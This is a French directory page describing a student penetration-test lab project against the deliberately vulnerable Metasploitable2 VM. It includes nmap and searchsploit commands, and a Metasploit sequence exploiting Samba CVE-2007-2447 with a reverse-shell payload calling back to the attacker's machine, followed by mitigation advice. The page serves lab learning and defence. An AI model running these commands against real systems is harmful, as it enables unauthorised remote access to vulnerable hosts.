Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
Penetration-Testing-on-Metasploitable2 — Projet de pentest pratique utilisant Kali Linux contre Metasploitable2. Comprend le flux de travail complet : scan Nmap, énumération, exploitation via Metasploit (Samba CVE-2007-2447), validation post-exploitation et étapes d'atténuation. Le dépôt contient les commandes, les sorties et un rapport présentant à la fois les techniques offensives et les recommandations défensives. | Kitploit
Outils/GitHubGitHub/seifeldienahmad/penetration-testing-on-metasploitable2
ReconnaissanceScanners de VulnérabilitésCartographie RéseauAnalyse des VulnérabilitésExploitationPost-ExploitationTests d'IntrusionApprentissage et ÉducationLabs et Pratique

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
GitHubseifeldienahmad/penetration-testing-on-metasploitable2

Penetration-Testing-on-Metasploitable2

Voir le dépôtSite web
1il y a 11 moisPas encore vérifié

À propos

Projet de pentest pratique utilisant Kali Linux contre Metasploitable2. Comprend le flux de travail complet : scan Nmap, énumération, exploitation via Metasploit (Samba CVE-2007-2447), validation post-exploitation et étapes d'atténuation. Le dépôt contient les commandes, les sorties et un rapport présentant à la fois les techniques offensives et les recommandations défensives.

Partager

Projet de stage 2 — Test d'intrusion sur Metasploitable2

  • Résumé : Ce projet illustre un flux de travail complet de test d'intrusion : reconnaissance, énumération, exploitation, validation post-exploitation et recommandations d'atténuation. La cible utilisée est Metasploitable2 et la machine d'attaque est Kali Linux.

  • Outils : Kali Linux (attaquant) Nmap (reconnaissance) Metasploit Framework (exploitation) SearchSploit / Exploit-DB (triage)

Étapes réalisées :

  1. Scan : sudo nmap -sS -sV -p- -T4 --open -oA scans/target 192.168.x.x Services identifiés (exemples) : vsftpd 2.3.4 (bannière du port 21), Samba smbd 3.x (port 445).
  2. Énumération et triage : searchsploit --nmap scans/target.xml searchsploit samba 3.0.20 Services mis en correspondance avec des exploits potentiels (backdoor vsftpd, Samba username-map).
  3. Exploitation
  • Backdoor vsftpd (CVE-2011-2523) tentée — bannière Nmap présente mais service sans réponse ; l'exploit n'a pas créé de session.
  • Samba (CVE-2007-2447) exploité avec succès : msfconsole use exploit/multi/samba/usermap_script set RHOSTS 192.168.x.x set payload cmd/unix/reverse set LHOST <kali-ip> set LPORT 4444 exploit Obtention d'un shell interactif et validation du contexte utilisateur.
  1. Post-exploitation
  • Informations système vérifiées : id uname -a
  • Preuves et captures d'écran collectées.
    1. Recommandations d'atténuation
    • Scans réguliers et inventaire des actifs.
    • Correctifs rapides et mises à niveau de versions (mise à jour de Samba).
    • Restreindre l'accès aux ports critiques (règles de pare-feu).
    • Désactiver les services inutilisés et l'accès anonyme.
    • Appliquer le moindre privilège aux partages et aux comptes.
    • Segmentation du réseau et journalisation/surveillance.
    • Planification de la réponse aux incidents.

    Résultat Un shell distant a été obtenu avec succès via un exploit Samba, le chemin d'attaque a été documenté et un plan d'atténuation a été produit. Les journaux complets et les sorties de commandes sont stockés dans le dossier scans/.

    Télécharger l’outil